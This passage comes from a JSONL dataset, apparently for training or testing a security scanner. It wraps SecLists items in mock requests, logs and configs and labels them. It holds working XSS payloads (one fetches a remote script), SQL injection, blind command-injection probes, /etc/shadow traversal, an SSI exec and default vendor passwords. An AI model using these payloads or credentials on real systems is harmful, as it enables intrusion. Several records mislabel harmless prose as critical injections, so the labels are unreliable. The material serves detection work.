"XSS"}}]} {"id": "seclists_00675", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3Becho%20FOTFWD$((3%2B5))$(echo%20FOTFWD)FOTFWD%2F%2F HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho%20FOTFWD$((3%2B5))$(echo%20FOTFWD)FOTFWD%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_00676", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00677", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_00678", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes x{}</style><abbr style=\"animation-name:x\" onanimationend=\"alert(1)\"></abbr>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><abbr style=\"animation-name:x\" onanimationend=\"alert(1)\"></abbr>", "injection_type": "XSS"}}]} {"id": "seclists_00679", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Cisco,<N/A>,cc,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Cisco,<N/A>,cc,"}}]} {"id": "seclists_00680", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<test></test>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<test></test>", "injection_type": "XXE"}}]} {"id": "seclists_00681", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"remote_user\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"remote_user\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00682", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<x contenteditable onfocus=alert(1)>focus this! HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x contenteditable onfocus=alert(1)>focus this!", "injection_type": "XSS"}}]} {"id": "seclists_00683", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:barkley", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "barkley"}}]} {"id": "seclists_00684", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf null", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "null", "injection_type": "cmd"}}]} {"id": "seclists_00685", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<rb onmouseleave=\"alert(1)\">test</rb>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rb onmouseleave=\"alert(1)\">test</rb>", "injection_type": "XSS"}}]} {"id": "seclists_00686", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><del oncontextmenu=\"alert(1)\">test</del></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<del oncontextmenu=\"alert(1)\">test</del>", "injection_type": "XSS"}}]} {"id": "seclists_00687", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Sweex,<BLANK>,mysweex,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sweex,<BLANK>,mysweex,"}}]} {"id": "seclists_00688", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<abbr onmouseout=\"alert(1)\">test</abbr>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<abbr onmouseout=\"alert(1)\">test</abbr>", "injection_type": "XSS"}}]} {"id": "seclists_00689", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>", "injection_type": "XSS"}}]} {"id": "seclists_00690", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector uses the __proto__ property to store the alert function and execute it afterwards with new label.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector uses the __proto__ property to store the alert function and execute it afterwards with new label.", "injection_type": "XSS"}}]} {"id": "seclists_00691", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt>", "injection_type": "XSS"}}]} {"id": "seclists_00692", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n%foo;", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "%foo;", "injection_type": "XXE"}}]} {"id": "seclists_00693", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><button onmousemove=\"alert(1)\">test</button></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<button onmousemove=\"alert(1)\">test</button>", "injection_type": "XSS"}}]} {"id": "seclists_00694", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3Becho$IFSLWOCMM$((20%2B40))$(echo$IFSLWOCMM)LWOCMM\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSLWOCMM$((20%2B40))$(echo$IFSLWOCMM)LWOCMM\"", "injection_type": "cmd"}}]} {"id": "seclists_00695", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=/**/or/**/1/**/=/**/1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/**/or/**/1/**/=/**/1", "injection_type": "SQL"}}]} {"id": "seclists_00696", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7Cecho%20SBQEFZ$((80%2B12))$(echo%20SBQEFZ)SBQEFZ\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho%20SBQEFZ$((80%2B12))$(echo%20SBQEFZ)SBQEFZ\\", "injection_type": "cmd"}}]} {"id": "seclists_00697", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {color:red;}</style><b id=x style=\"transition:color 1s\" ontransitionend=alert(1)></b>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color:red;}</style><b id=x style=\"transition:color 1s\" ontransitionend=alert(1)></b>", "injection_type": "XSS"}}]} {"id": "seclists_00698", "source": "seclists", "source_license": "MIT", "text": "password: GrandStream,Administrator,admin,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "GrandStream,Administrator,admin,"}}]} {"id": "seclists_00699", "source": "seclists", "source_license": "MIT", "text": "password: anna\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "anna"}}]} {"id": "seclists_00700", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<legend id=x tabindex=1 onfocus=alert(1)></legend> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<legend id=x tabindex=1 onfocus=alert(1)></legend>", "injection_type": "XSS"}}]} {"id": "seclists_00701", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=IBM,POST,BASE,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,POST,BASE,"}}]} {"id": "seclists_00702", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=sylvie\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sylvie"}}]} {"id": "seclists_00703", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=declare @s varchar(200) select @s = 0x77616974 ... HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @s varchar(200) select @s = 0x77616974 ...", "injection_type": "SQL"}}]} {"id": "seclists_00704", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ''^'';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'^'", "injection_type": "SQL"}}]} {"id": "seclists_00705", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#X003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X003c", "injection_type": "cmd"}}]} {"id": "seclists_00706", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<select onchange=alert(1)><option>1<option>2 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<select onchange=alert(1)><option>1<option>2", "injection_type": "XSS"}}]} {"id": "seclists_00707", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<button oncontextmenu=\"alert(1)\">test</button> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<button oncontextmenu=\"alert(1)\">test</button>", "injection_type": "XSS"}}]} {"id": "seclists_00708", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=%2A%7C HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%7C", "injection_type": "LDAP"}}]} {"id": "seclists_00709", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Asante,superuser,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Asante,superuser,<BLANK>,"}}]} {"id": "seclists_00710", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=../../../../../../../../../../../../etc/shadow HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "../../../../../../../../../../../../etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_00711", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#exec cmd=\"whoami\"-->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#exec cmd=\"whoami\"-->", "injection_type": "SSI"}}]} {"id": "seclists_00712", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector utilizes an urlencoded JS image source to create an alert.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector utilizes an urlencoded JS image source to create an alert.", "injection_type": "XSS"}}]} {"id": "seclists_00713", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: A=alert;A(1)\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: A=alert;A(1)", "injection_type": "XSS"}}]} {"id": "seclists_00714", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\"a\"\" or 3=3--\" HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"a\"\" or 3=3--\"", "injection_type": "SQL"}}]} {"id": "seclists_00715", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><script src=//brutelogic.com.br/1.js></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script src=//brutelogic.com.br/1.js>", "injection_type": "XSS"}}]} {"id": "seclists_00716", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Digital Equipment,USER,USER,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,USER,USER,"}}]} {"id": "seclists_00717", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: Since Javascript allows \\w+ as variable name - this vector uses _ to evade filters.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Since Javascript allows \\w+ as variable name - this vector uses _ to evade filters.", "injection_type": "XSS"}}]} {"id": "seclists_00718", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=1228\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "1228"}}]} {"id": "seclists_00719", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <body onload=;;;;;;;;;;;_=alert;_(1);;;; HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <body onload=;;;;;;;;;;;_=alert;_(1);;;;", "injection_type": "XSS"}}]} {"id": "seclists_00720", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: with(document.__parent__)alert(1)</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: with(document.__parent__)alert(1)", "injection_type": "XSS"}}]} {"id": "seclists_00721", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: .mario</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_00722", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 1=1 or \"\"= HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1 or \"\"=", "injection_type": "SQL"}}]} {"id": "seclists_00723", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x", "injection_type": "cmd"}}]} {"id": "seclists_00724", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#flastmod virtual=\"echo.html\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#flastmod virtual=\"echo.html\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00725", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%3B%20str%3D%24%28echo%20BBUDLO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_00726", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Sierra Wireless,user,12345,http://mycusthelp.net/SIERRAWIRELESS/_cs/AnswerDetail.aspx?sSessionID=&aid=468@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sierra Wireless,user,12345,http://mycusthelp.net/SIERRAWIRELESS/_cs/AnswerDetail.aspx?sSessionID=&aid=468"}}]} {"id": "seclists_00727", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=comcast\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "comcast"}}]} {"id": "seclists_00728", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_00729", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3C%3F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3C%3F", "injection_type": "cmd"}}]} {"id": "seclists_00730", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"||echo$IFSJIAXIU$((62%2B56))$(echo$IFSJIAXIU)JIAXIU\\ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"||echo$IFSJIAXIU$((62%2B56))$(echo$IFSJIAXIU)JIAXIU\\", "injection_type": "cmd"}}]} {"id": "seclists_00731", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_00732", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector breaks JS integer assignments in arrays.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector breaks JS integer assignments in arrays.", "injection_type": "XSS"}}]} {"id": "seclists_00733", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%206%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_00734", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26echo%20LQDBIP$((97%2B15))$(echo%20LQDBIP)LQDBIP HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26echo%20LQDBIP$((97%2B15))$(echo%20LQDBIP)LQDBIP", "injection_type": "cmd"}}]} {"id": "seclists_00735", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Digital Equipment,FIELD,FIELD,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,FIELD,FIELD,"}}]} {"id": "seclists_00736", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Cookie Manipulation</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Cookie Manipulation", "injection_type": "XSS"}}]} {"id": "seclists_00737", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: This vector breaks single quoted URL input</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector breaks single quoted URL input", "injection_type": "XSS"}}]} {"id": "seclists_00738", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<xmp id=x tabindex=1 onactivate=alert(1)></xmp> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xmp id=x tabindex=1 onactivate=alert(1)></xmp>", "injection_type": "XSS"}}]} {"id": "seclists_00739", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes x{}</style><isindex style=\"animation-name:x\" onanimationend=\"alert(1)\"></isindex>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><isindex style=\"animation-name:x\" onanimationend=\"alert(1)\"></isindex>", "injection_type": "XSS"}}]} {"id": "seclists_00740", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello $field.in(\"org.apache.velocity.runtime.RuntimeConstants\")</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "$field.in(\"org.apache.velocity.runtime.RuntimeConstants\")", "injection_type": "SSTI"}}]} {"id": "seclists_00741", "source": "seclists", "source_license": "MIT", "text": "filename=\"%7Cecho$IFSQWRACU$((69%2B14))$(echo$IFSQWRACU)QWRACU%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%7Cecho$IFSQWRACU$((69%2B14))$(echo$IFSQWRACU)QWRACU%26", "injection_type": "cmd"}}]} {"id": "seclists_00742", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>", "injection_type": "XXE"}}]} {"id": "seclists_00743", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Obfuscated JS image source</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Obfuscated JS image source", "injection_type": "XSS"}}]} {"id": "seclists_00744", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: echo%20FVWBKZ$((56%2B38))$(echo%20FVWBKZ)FVWBKZ%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo%20FVWBKZ$((56%2B38))$(echo%20FVWBKZ)FVWBKZ%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_00745", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%7C%20%5B%202%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%202%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_00746", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=$smarty.config HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "$smarty.config", "injection_type": "SSTI"}}]} {"id": "seclists_00747", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: URI exploits, general, injection, obfuscated, internet explorer</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: URI exploits, general, injection, obfuscated, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_00748", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...", "injection_type": "XSS"}}]} {"id": "seclists_00749", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<map oncontextmenu=\"alert(1)\">test</map> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<map oncontextmenu=\"alert(1)\">test</map>", "injection_type": "XSS"}}]} {"id": "seclists_00750", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Nortel,conferencing,admin,http://support.avaya.com/css/P8/documents/100097575\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Nortel,conferencing,admin,http://support.avaya.com/css/P8/documents/100097575"}}]} {"id": "seclists_00751", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>JSON based onload vector</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JSON based onload vector", "injection_type": "XSS"}}]} {"id": "seclists_00752", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00753", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><footer onclick=\"alert(1)\">test</footer></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<footer onclick=\"alert(1)\">test</footer>", "injection_type": "XSS"}}]} {"id": "seclists_00754", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {color:red;}</style><blink id=x style=\"transition:color 1s\" ontransitionend=alert(1)></blink>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color:red;}</style><blink id=x style=\"transition:color 1s\" ontransitionend=alert(1)></blink>", "injection_type": "XSS"}}]} {"id": "seclists_00755", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:keenan", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": 